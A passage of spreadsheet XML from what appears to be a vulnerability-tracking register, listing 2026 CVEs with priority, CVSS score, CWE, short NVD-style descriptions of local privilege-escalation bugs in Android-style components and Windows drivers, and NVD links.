      <c r="T437" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28663</t>
        </is>
      </c>
    </row>
    <row r="438">
      <c r="A438" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B438" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C438" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28664</t>
        </is>
      </c>
      <c r="D438" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E438" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F438" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G438" s="5" t="inlineStr"/>
      <c r="H438" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I438" s="5" t="inlineStr"/>
      <c r="J438" s="5" t="inlineStr"/>
      <c r="K438" s="5" t="inlineStr"/>
      <c r="L438" s="5" t="inlineStr"/>
      <c r="M438" s="5" t="inlineStr"/>
      <c r="N438" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O438" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P438" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q438" s="5" t="inlineStr"/>
      <c r="R438" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="S438" s="5" t="inlineStr">
        <is>
          <t>In WriteImageToDisk of runtime_image.cc, there is a possible file tampering due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T438" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28664</t>
        </is>
      </c>
    </row>
    <row r="439">
      <c r="A439" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B439" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C439" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-28668</t>
        </is>
      </c>
      <c r="D439" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E439" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F439" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G439" s="5" t="inlineStr"/>
      <c r="H439" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I439" s="5" t="inlineStr"/>
      <c r="J439" s="5" t="inlineStr"/>
      <c r="K439" s="5" t="inlineStr"/>
      <c r="L439" s="5" t="inlineStr"/>
      <c r="M439" s="5" t="inlineStr"/>
      <c r="N439" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O439" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P439" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q439" s="5" t="inlineStr"/>
      <c r="R439" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="S439" s="5" t="inlineStr">
        <is>
          <t>In LimitRealloc of malloc_limit.cpp, there is a possible use after free due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T439" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-28668</t>
        </is>
      </c>
    </row>
    <row r="440">
      <c r="A440" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B440" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C440" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45515</t>
        </is>
      </c>
      <c r="D440" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E440" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F440" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G440" s="5" t="inlineStr"/>
      <c r="H440" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I440" s="5" t="inlineStr"/>
      <c r="J440" s="5" t="inlineStr"/>
      <c r="K440" s="5" t="inlineStr"/>
      <c r="L440" s="5" t="inlineStr"/>
      <c r="M440" s="5" t="inlineStr"/>
      <c r="N440" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O440" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P440" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q440" s="5" t="inlineStr"/>
      <c r="R440" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-787</t>
        </is>
      </c>
      <c r="S440" s="5" t="inlineStr">
        <is>
          <t>In a2dp_vendor_opus_decoder_decode_packet of a2dp_vendor_opus_decoder.cc, there is a possible out of bounds write due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T440" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45515</t>
        </is>
      </c>
    </row>
    <row r="441">
      <c r="A441" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B441" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C441" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45520</t>
        </is>
      </c>
      <c r="D441" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E441" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F441" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G441" s="5" t="inlineStr"/>
      <c r="H441" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I441" s="5" t="inlineStr"/>
      <c r="J441" s="5" t="inlineStr"/>
      <c r="K441" s="5" t="inlineStr"/>
      <c r="L441" s="5" t="inlineStr"/>
      <c r="M441" s="5" t="inlineStr"/>
      <c r="N441" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O441" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P441" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q441" s="5" t="inlineStr"/>
      <c r="R441" s="5" t="inlineStr">
        <is>
          <t>CWE-441</t>
        </is>
      </c>
      <c r="S441" s="5" t="inlineStr">
        <is>
          <t>In onAttach of BiometricsSettingsBase.java, there is a possible authentication bypass due to a confused deputy. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T441" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45520</t>
        </is>
      </c>
    </row>
    <row r="442">
      <c r="A442" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B442" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C442" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-45531</t>
        </is>
      </c>
      <c r="D442" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E442" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F442" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G442" s="5" t="inlineStr"/>
      <c r="H442" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I442" s="5" t="inlineStr"/>
      <c r="J442" s="5" t="inlineStr"/>
      <c r="K442" s="5" t="inlineStr"/>
      <c r="L442" s="5" t="inlineStr"/>
      <c r="M442" s="5" t="inlineStr"/>
      <c r="N442" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O442" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P442" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q442" s="5" t="inlineStr"/>
      <c r="R442" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S442" s="5" t="inlineStr">
        <is>
          <t>In read_boot_region of fsck.c, there is a possible out of bounds read due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T442" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-45531</t>
        </is>
      </c>
    </row>
    <row r="443">
      <c r="A443" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B443" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C443" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49881</t>
        </is>
      </c>
      <c r="D443" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E443" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F443" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G443" s="5" t="inlineStr"/>
      <c r="H443" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I443" s="5" t="inlineStr"/>
      <c r="J443" s="5" t="inlineStr"/>
      <c r="K443" s="5" t="inlineStr"/>
      <c r="L443" s="5" t="inlineStr"/>
      <c r="M443" s="5" t="inlineStr"/>
      <c r="N443" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O443" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P443" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q443" s="5" t="inlineStr"/>
      <c r="R443" s="5" t="inlineStr">
        <is>
          <t>CWE-693</t>
        </is>
      </c>
      <c r="S443" s="5" t="inlineStr">
        <is>
          <t>In serviceClassExists of InCallController.java, there is a possible arbitrary code execution due to a logic error in the code. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T443" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49881</t>
        </is>
      </c>
    </row>
    <row r="444">
      <c r="A444" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B444" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C444" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49884</t>
        </is>
      </c>
      <c r="D444" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E444" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F444" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G444" s="5" t="inlineStr"/>
      <c r="H444" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I444" s="5" t="inlineStr"/>
      <c r="J444" s="5" t="inlineStr"/>
      <c r="K444" s="5" t="inlineStr"/>
      <c r="L444" s="5" t="inlineStr"/>
      <c r="M444" s="5" t="inlineStr"/>
      <c r="N444" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O444" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P444" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q444" s="5" t="inlineStr"/>
      <c r="R444" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="S444" s="5" t="inlineStr">
        <is>
          <t>In rw_mfc_handle_read_op of rw_mfc.cc, there is a possible out of bounds write due to an incorrect bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T444" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49884</t>
        </is>
      </c>
    </row>
    <row r="445">
      <c r="A445" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B445" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C445" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49887</t>
        </is>
      </c>
      <c r="D445" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E445" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F445" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G445" s="5" t="inlineStr"/>
      <c r="H445" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I445" s="5" t="inlineStr"/>
      <c r="J445" s="5" t="inlineStr"/>
      <c r="K445" s="5" t="inlineStr"/>
      <c r="L445" s="5" t="inlineStr"/>
      <c r="M445" s="5" t="inlineStr"/>
      <c r="N445" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O445" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P445" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q445" s="5" t="inlineStr"/>
      <c r="R445" s="5" t="inlineStr">
        <is>
          <t>CWE-288</t>
        </is>
      </c>
      <c r="S445" s="5" t="inlineStr">
        <is>
          <t>In maybeRemoveInvalidInstallerPackageName of InstallRepository.kt, there is a possible unauthorized app update due to a permissions bypass. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T445" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49887</t>
        </is>
      </c>
    </row>
    <row r="446">
      <c r="A446" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B446" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C446" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49918</t>
        </is>
      </c>
      <c r="D446" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E446" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F446" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G446" s="5" t="inlineStr"/>
      <c r="H446" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I446" s="5" t="inlineStr"/>
      <c r="J446" s="5" t="inlineStr"/>
      <c r="K446" s="5" t="inlineStr"/>
      <c r="L446" s="5" t="inlineStr"/>
      <c r="M446" s="5" t="inlineStr"/>
      <c r="N446" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O446" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P446" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q446" s="5" t="inlineStr"/>
      <c r="R446" s="5" t="inlineStr">
        <is>
          <t>CWE-787</t>
        </is>
      </c>
      <c r="S446" s="5" t="inlineStr">
        <is>
          <t>In multiple functions, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T446" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49918</t>
        </is>
      </c>
    </row>
    <row r="447">
      <c r="A447" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B447" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C447" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49919</t>
        </is>
      </c>
      <c r="D447" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E447" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F447" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G447" s="5" t="inlineStr"/>
      <c r="H447" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I447" s="5" t="inlineStr"/>
      <c r="J447" s="5" t="inlineStr"/>
      <c r="K447" s="5" t="inlineStr"/>
      <c r="L447" s="5" t="inlineStr"/>
      <c r="M447" s="5" t="inlineStr"/>
      <c r="N447" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O447" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P447" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="Q447" s="5" t="inlineStr"/>
      <c r="R447" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S447" s="5" t="inlineStr">
        <is>
          <t>In tt_face_colr_blend_layer of ttcolr.c, there is a possible remote code execution due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T447" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49919</t>
        </is>
      </c>
    </row>
    <row r="448">
      <c r="A448" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B448" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C448" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49927</t>
        </is>
      </c>
      <c r="D448" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E448" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F448" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G448" s="5" t="inlineStr"/>
      <c r="H448" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I448" s="5" t="inlineStr"/>
      <c r="J448" s="5" t="inlineStr"/>
      <c r="K448" s="5" t="inlineStr"/>
      <c r="L448" s="5" t="inlineStr"/>
      <c r="M448" s="5" t="inlineStr"/>
      <c r="N448" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O448" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P448" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q448" s="5" t="inlineStr"/>
      <c r="R448" s="5" t="inlineStr">
        <is>
          <t>CWE-190</t>
        </is>
      </c>
      <c r="S448" s="5" t="inlineStr">
        <is>
          <t>In multiple locations, there is a possible out of bounds write due to an integer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T448" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49927</t>
        </is>
      </c>
    </row>
    <row r="449">
      <c r="A449" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B449" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C449" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49932</t>
        </is>
      </c>
      <c r="D449" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E449" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F449" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G449" s="5" t="inlineStr"/>
      <c r="H449" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I449" s="5" t="inlineStr"/>
      <c r="J449" s="5" t="inlineStr"/>
      <c r="K449" s="5" t="inlineStr"/>
      <c r="L449" s="5" t="inlineStr"/>
      <c r="M449" s="5" t="inlineStr"/>
      <c r="N449" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O449" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P449" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q449" s="5" t="inlineStr"/>
      <c r="R449" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S449" s="5" t="inlineStr">
        <is>
          <t>In parseParts of PduParser.java, there is a possible out of bounds read due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T449" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49932</t>
        </is>
      </c>
    </row>
    <row r="450">
      <c r="A450" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B450" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C450" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55273</t>
        </is>
      </c>
      <c r="D450" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E450" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F450" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G450" s="5" t="inlineStr"/>
      <c r="H450" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I450" s="5" t="inlineStr"/>
      <c r="J450" s="5" t="inlineStr"/>
      <c r="K450" s="5" t="inlineStr"/>
      <c r="L450" s="5" t="inlineStr"/>
      <c r="M450" s="5" t="inlineStr"/>
      <c r="N450" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O450" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P450" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q450" s="5" t="inlineStr"/>
      <c r="R450" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="S450" s="5" t="inlineStr">
        <is>
          <t>In AppendCommentLine of AnnotationProcessor.cpp, there is a possible supply chain risk due to improper input validation. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T450" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55273</t>
        </is>
      </c>
    </row>
    <row r="451">
      <c r="A451" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B451" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C451" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55285</t>
        </is>
      </c>
      <c r="D451" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E451" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F451" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G451" s="5" t="inlineStr"/>
      <c r="H451" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I451" s="5" t="inlineStr"/>
      <c r="J451" s="5" t="inlineStr"/>
      <c r="K451" s="5" t="inlineStr"/>
      <c r="L451" s="5" t="inlineStr"/>
      <c r="M451" s="5" t="inlineStr"/>
      <c r="N451" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O451" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P451" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q451" s="5" t="inlineStr"/>
      <c r="R451" s="5" t="inlineStr">
        <is>
          <t>CWE-120</t>
        </is>
      </c>
      <c r="S451" s="5" t="inlineStr">
        <is>
          <t>In openLogicalChannel of multiple files, there is a possible out-of-bounds write due to a missing bounds check. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T451" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55285</t>
        </is>
      </c>
    </row>
    <row r="452">
      <c r="A452" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B452" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C452" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-55294</t>
        </is>
      </c>
      <c r="D452" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E452" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F452" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G452" s="5" t="inlineStr"/>
      <c r="H452" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I452" s="5" t="inlineStr"/>
      <c r="J452" s="5" t="inlineStr"/>
      <c r="K452" s="5" t="inlineStr"/>
      <c r="L452" s="5" t="inlineStr"/>
      <c r="M452" s="5" t="inlineStr"/>
      <c r="N452" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O452" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P452" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q452" s="5" t="inlineStr"/>
      <c r="R452" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="S452" s="5" t="inlineStr">
        <is>
          <t>In ihevcd_get_tu_data_size of ihevcd_utils.c, there is a possible out of bounds write due to a heap buffer overflow. This could lead to local escalation of privilege with no additional execution privileges needed. User interaction is not needed for exploitation.</t>
        </is>
      </c>
      <c r="T452" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-55294</t>
        </is>
      </c>
    </row>
    <row r="453">
      <c r="A453" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B453" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C453" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56172</t>
        </is>
      </c>
      <c r="D453" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E453" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F453" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G453" s="5" t="inlineStr"/>
      <c r="H453" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I453" s="5" t="inlineStr"/>
      <c r="J453" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K45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53" s="5" t="inlineStr"/>
      <c r="M453" s="5" t="inlineStr"/>
      <c r="N453" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O453" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P453" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q453" s="5" t="inlineStr"/>
      <c r="R453" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="S453" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows VHD miniport driver allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="T453" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-56172</t>
        </is>
      </c>
    </row>
    <row r="454">
      <c r="A454" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B454" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C454" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-56177</t>
        </is>
      </c>
      <c r="D454" s="5" t="n">
        <v>7.8</v>
      </c>
      <c r="E454" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F454" s="5" t="inlineStr">
        <is>
          <t>secure@microsoft.com</t>
        </is>
      </c>
      <c r="G454" s="5" t="inlineStr"/>
      <c r="H454" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I454" s="5" t="inlineStr"/>
      <c r="J454" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_server</t>
        </is>
      </c>
      <c r="K45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4" s="5" t="inlineStr"/>
      <c r="M454" s="5" t="inlineStr"/>
      <c r="N454" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O454" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
